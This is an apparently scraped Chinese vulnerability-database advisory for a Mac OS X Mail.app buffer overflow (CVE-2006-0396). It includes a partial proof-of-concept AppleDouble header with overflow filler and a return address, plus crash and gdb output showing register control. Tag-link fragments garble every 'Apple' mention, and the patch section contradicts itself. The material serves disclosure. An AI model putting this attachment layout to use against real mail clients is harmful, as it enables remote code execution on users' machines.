漏洞信息详情
CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple Mac OS X邮件消息附件远程缓冲区溢出漏洞
- CNNVD编号:CNNVD-200603-268
- 危害等级: 中危
- CVE编号: CVE-2006-0396
- 漏洞类型: 缓冲区溢出
- 发布时间: 2006-03-14
- 威胁类型: 远程
- 更新时间: 2006-03-21
- 厂 商: CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple
- 漏洞来源: Kevin Finisterre d...
漏洞简介
CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple Mac OS X是苹果家族电脑所使用的操作系统。
CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple Mac OS X的2006-001安全更新存在缓冲区溢出漏洞,攻击者可能利用此漏洞在机器上执行任意指令。
在安装CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple的2006-001安全更新后,Mail.app中存在缓冲区溢出漏洞。攻击者可以发送包含有CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>AppleDouble头信息的特制MIME封装Macintosh文件来触发这个漏洞。例如:
\"\x00\x05\x16\x07\". # CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>AppleDouble Magic Number
\"\x00\x02\x00\x00\". # Version 2
\"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\". # 16 Bytes of filler
\"\x00\x03\x00\x00\". # Number of entries (3)
\"\x00\x09\x00\x00\". # Entry ID 9 is for \'\'Finder Info\'\'
\"\x00\x3e\x00\x00\". # Start of Finder Info data is at file offset 0x3e
\"\x00\x0a\x00\x00\". # Length of Finder Info is 0x0a or 10
\"\x00\x03\x00\x00\". # Entry ID 3 is for \'\'Real Name\'\'
\"\x00\x48\x00\x00\". # Start of Real Name data is at file offset 0x48
\"\x00\xf5\x00\x00\". # Length of Real Name is 0xf5 or 245
\"\x00\x02\x00\x00\". # Entry ID 2 is for \'\'Resource Fork\'\'\"\x01\x3d\x00\x00\". # Start of Resource Fork is at file offset 0x013d
\"\x05\x3a\x00\x00\". # Length of Resource fork is 0x053a
\"\x00\x00\x00\x00\". # <null> filler
\"\x00\x00\x00\x00\". # <null> filler
\"A\" x 226 . \"$retaddr\" x 3 . \"zzz.mov.\" . # remember this length is hard coded above.
...
如果Mail.app收件箱中收到了有上述首部的消息的话,用户就只能看到Real Name项所提供的名称的前11个字符,在这个例子中是\"AAAAAAAAAAA...mov\"。其他例子还可能包括\"SuperTastey...mov\"或\"NakedChicks...mov\"等。
如果双击了附件文件,就会导致以下dump:
Date/Time: 2006-03-04 10:35:32.472 -0500
OS Version: 10.4.5 (Build 8H14)
Report Version: 4
Command: Mail
Path: /Applications/Mail.app/Contents/MacOS/Mail
Parent: WindowServer [64]
Version: 2.0.7 (746.2)
Build Version: 1
Project Name: MailViewer
Source Version: 7460200
PID: 271
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140
在gdb可以看到有几处溢出:
(gdb) bt
#0 0x41424344 in ?? ()
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313131
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
#1 0x41424344 in ?? ()
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313131
warning: Previous frame identical to this frame (corrupt stack?)
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313139
这样就控制了r0、pc、lr和一半的r31。
(gdb) i r $r0 $pc $lr $r31
r0 0x41424344 1094861636
pc 0x41424344 1094861636
lr 0x41424344 1094861636
r31 0x18b3030 25899056
成功利用这个漏洞的攻击者可以远程执行任意指令。
漏洞公告
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple SecUpd2006-002Intel.dmg
http://wsidecar.CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple.com/cgi-bin/nph-reg3rdpty1.pl/product=09965&cat=1&platform=osx&method=sa/SecUpd2006-002Intel.dmg
CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple SecUpd2006-002Ti.dmg
http://wsidecar.CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple.com/cgi-bin/nph-reg3rdpty1.pl/product=09964&cat=1&platform=osx&method=sa/SecUpd2006-002Ti.dmg
参考网址
来源: US-CERT
名称: VU#980084
链接:http://www.kb.cert.org/vuls/id/980084
来源: BID
名称: 17081
链接:http://www.securityfocus.com/bid/17081
来源: VUPEN
名称: ADV-2006-0949
链接:http://www.frsirt.com/english/advisories/2006/0949
来源: SECTRACK
名称: 1015762
链接:http://securitytracker.com/id?1015762
来源: SECUNIA
名称: 19129
链接:http://secunia.com/advisories/19129
来源: BUGTRAQ
名称: 20060314 DMA[2006-0313a] - 'CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple OSX Mail.app RFC1740 Real 名称 Buffer Overflow'
链接:http://www.securityfocus.com/archive/1/archive/1/427601/100/0/threaded
来源: MISC
链接:http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt
来源: CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple
名称: CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple-SA-2006-03-13
链接:http://lists.CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple.com/archives/security-announce/2006/Mar/msg00001.HTML
来源: docs.info.CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple.com
链接:http://docs.info.CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple.com/article.HTML?artnum=303453
来源: XF
名称: macosx-mail-attachment-bo(25209)
链接:http://xforce.iss.net/xforce/xfdb/25209
来源: OSVDB
名称: 23872
链接:http://www.osvdb.org/23872
受影响实体
- CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple Mac_os_x_server:10.4.1
- CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple Mac_os_x:10.4.1
- CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple Mac_os_x:10.4.4
- CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple Mac_os_x_server:10.4.5
- CMS.zone.ci/e/tags/htag.php?tag=Apple target=_blank class=infotextkey>Apple Mac_os_x_server:10.4.4
补丁
暂无
![weinxin](http://zone.ci/zone_ci_images/zone.ci.png)
评论